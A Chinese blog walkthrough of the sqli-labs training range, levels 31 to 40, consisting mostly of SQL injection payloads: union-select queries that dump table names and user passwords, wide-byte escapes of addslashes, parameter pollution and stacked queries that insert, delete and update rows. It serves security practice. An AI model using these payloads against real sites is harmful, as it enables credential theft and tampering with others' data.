SQLi-labs靶场(31-40)过关超详细0基础

已于 2024-07-29 23:06:45 修改
阅读量497 收藏 7
点赞数 9
分类专栏: sqli-labs 文章标签: 数据库 sql mysql web安全
于 2024-07-29 23:05:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67803321/article/details/140783371
版权

第三十一关

这一关与前两天一样,只是")闭合

?id=1&id=1")order by 4--+

#确定显位

?id=1&id=-1")union select 1,2,database()--+

#爆库

?id=1&id=-1")union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

#爆表

?id=1&id=-1")union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

#爆列

?id=1&id=-1")union select 1,2,group_concat(username,password) from users--+

#爆字段

获取全部的账号密码信息,过关

第三十二关

本关主要是宽字节注入

有这行代码才可行

这一关存在addslashes过滤,会转义加上一个\

只需要在写成

?id=1%A0%27--+

写成%A0%27的情况下 addslashes会无视掉%A0而直接给%27加斜线,斜线是%5C 于是就变成了这样子 %A0%5C%27,前面两个构成一个宽字符 然后%27就单独被解析了

接下来就常规注入了

?id=-1%A0%27order by 4--+

?id=-1%A0%27union select 1,2,3--+

#判断显位

?id=-1%A0%27union select 1,2,database()--+

#爆库

?id=-1%A0%27union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

#爆表

?id=-1%A0%27union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+

#因为单引号都被过滤了,所以我们需要使用十六进制,然后在前面加上0x

?id=-1%A0%27union select 1,2,group_concat(username,password) from users--+

得到全部的账号密码信息

过关

第三十三关

这关与三十二关一模一样

?id=1%A0'order by 4--+

?id=-1%A0'union select 1,2,3--+

?id=-1%A0'union select 1,2,database()--+

?id=-1%A0'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

?id=-1%A0'union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+

?id=-1%A0'union select 1,2,group_concat(username,password) from users--+

过关

第三十四关

又是熟悉的登录界面

经过尝试,发现账号密码都存在addslashes转义

应该也是使用宽字节

账号密码都存在注入点

1%A0'order by 3--+

判断只有两位

1%A0'union select 1,2--+

判断显位

1%A0'union select 1,database()--+

爆库

1%A0'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆表

1%A0'union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+

爆列(需要使用单引号的需要转换成十六进制再加上0x)

 

1%A0'union select 1,group_concat(username,password) from users--+

爆字段

获取全部的账号密码信息

过关

第三十五关

?id=1 --+

#这关没用引号闭合

?id=1 order by 4--+

?id=-1 union select 1,2,3--+

#确定显位

?id=-1 union select 1,2,database()--+

爆库

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆表

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+

爆列

?id=-1 union select 1,2,group_concat(username,password) from users--+

爆字段

获取全部的账号密码信息

过关

第三十六关

这关主要是转义函数换成了mysql_real_escape_string,绕过方法与前面一致

?id=1%A0' order by 4--+

?id=-1%A0' union select 1,2,3--+

确定显位

?id=-1%A0' union select 1,2,database()--+

爆库

?id=-1%A0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆表

?id=-1%A0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+

爆列

?id=-1%A0 ' union select 1,2,group_concat(username,password) from users--+

爆字段

获取全部的账号密码信息

过关

第三十七关

这关主要是使用mysql_real_escape_string进行转义

与三十四关一样

1%A0'order by 3--+

1%A0'union select 1,2--+

#确定显位

1%A0'union select 1,database()--+

#爆库

1%A0'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

#爆表

1%A0'union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+

#爆列

1%A0'union select 1,group_concat(username,password) from users--+

3爆字段

获得全部的账号密码信息

过关

第三十八关

这一关就是正常的单引号闭合

但是存在堆叠注入,可以多条sql语句执行

尝试进行增删改查

?id=1';insert into users(id,username,password) values ('38','less38','hello')--+

?id=1';delete from users where username='less38'--+

?id=1';update users set username='admin5' where username='admin4'--+

?id=-1' order by 4--+

?id=-1' union select 1,2,3--+

?id=-1' union select 1,2,database()--+

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=-1' union select 1,2,group_concat(username,password) from users--+

获取账号密码信息

过关

第三十九关

Id参数是整数

这关正常注入就行了

?id=-1 order by 4--+

?id=-1 union select 1,2,3--+

?id=-1 union select 1,2,database()--+

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=-1 union select 1,2,group_concat(username,password) from users--+

获取账号密码信息

过关

第四十关

这关是单引号括号闭合

正常使用联合查询就行了

?id=-1')union select 1,2,3--+

?id=-1')union select 1,2,database()--+

?id=-1')union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

?id=-1')union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=-1')union select 1,2,group_concat(username,password) from users--+

获取全部账号密码信息

过关

YopFy
关注
专栏目录
sqli-labs33-40
willow_liang的博客
11-07 228
Less33 php函数了解 addslashes (PHP 4, PHP 5, PHP 7) addslashes — 使用反斜线引用字符串 说明 addslashes ( string $str ) : string 返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)。 一个使用 addslashes() 的例子是当你要往数据库中输入数据时。 例如,将名字 O'reilly 插入到数据库中,这就
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1444
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs(40)
weixin_30894583的博客
06-02 264
0X01同样是构造闭合 这里的闭合条件是') 构造语句 ?id=1');insert into users values(100,'tx','tx')%23 在客户端mysql里面看看 嘿嘿 成功执行 切记 学习之路 少就是多 慢就是快 转载于:https://www.cnblogs.com/-zhong/p/10961635.html...
SQLi-LABS通攻略【31-35
最新发布
qq_65852138的博客
08-26 858
SQLi-LABS通攻略【31-35
sqli-labs进阶篇 29~31
Lucky小小吴的小屋
02-06 659
本文章主要讲述sqli-labs靶场第29到32的通心得,从三方面讲述如何通,分别是注入点判断、源码分析、注入过程。文章若有不恰当之处,望指出~~
SQL-Labs靶场“34-35”教程
钟言的博客
03-18 2605
本篇为SQL-Labs靶场的34到35教程,详细内容包含了:34 POST单引号宽字节注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入 35 GET数字型报错注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入等内容
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
Sqli-labs靶场第12详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 745
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场详细攻略Less 1-5
qq_41755084的博客
10-09 1584
Sqli-labs靶场详细攻略
Sqli-labs靶场第2详解[Sqli-labs-less-2]
m0_73615178的博客
02-19 666
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
(手工)【sqli-labs40、41】堆叠注入、盲注
07-15 1706
SQL-堆叠、盲注】
sqli-labs 21——40攻略
weixin_45880717的博客
02-02 1090
Less-21 基于错误的复杂的字符型Cookie注入 base64编码,单引号,报错型,cookie型注入。 本和less-20相似,只是cookie的uname值经过base64编码了。 登录后页面: 圈出来的地方显然是base64加密过的,解码得到:admin,就是刚才登陆的uname,所以猜测:本题在cookie处加密了字符串, 查看php文件确实如此,所以只需要上传paylaod的时...
基于Sqli-Labs靶场SQL注入-29~31
Joker
01-07 530
这一篇博客我主要将了HTTP参数污染攻击。同时讲了一下双服务器的工作原理。
sqli-liabs学习SQL注入之旅(第三十一~第四十
guanjian_ci的博客
05-05 653
三十一 (考察内容:双引号+括号、参数污染) 这一和二十九、三十几乎相同,这参数接受方式为 id = ("&id"),直接爆出数据! ?id=1&id=0") union select 1,group_concat(username,password),3 from users--+ 三十二 (基于宽字符逃逸注入;简称:宽字节注入) 简单测试或分析源码,代码中利用正则匹配将 [ /,'," ]这些三个符号都过滤掉了。 拓展学习:在mysql中,用于转
sqli-labs-master前三十一到四十过关总结
Alexz__的博客
02-13 907
第三十一: 换了个闭合 第三十二数据库连接的致命性错误,导致二层ubuntu服务器mysql无法连接 遂跳过 第三十三: 这一开始就可以回到我们的phpstudy了,不再需要jspstudy和ubuntu虚拟机的辅助 发现我们的单引号前面被加了一个斜杠 \ 观察源码,发现此内容...
sqli-Labs————less-40
Fly_鹏程万里
05-20 1077
Less-40查看源代码:<?php error_reporting(0); include("../sql-connections/db-creds.inc"); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-tr...
详细sqli-labs(1-65)通讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
SQL注入篇——sqli-labs最详细1-40指南
热门推荐
爱国小白帽
01-11 3万+
使用sqllabs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一,在网址中添加标红内容,显示了用户和密码 http://localhost/sqllabs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二,在网址中添...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值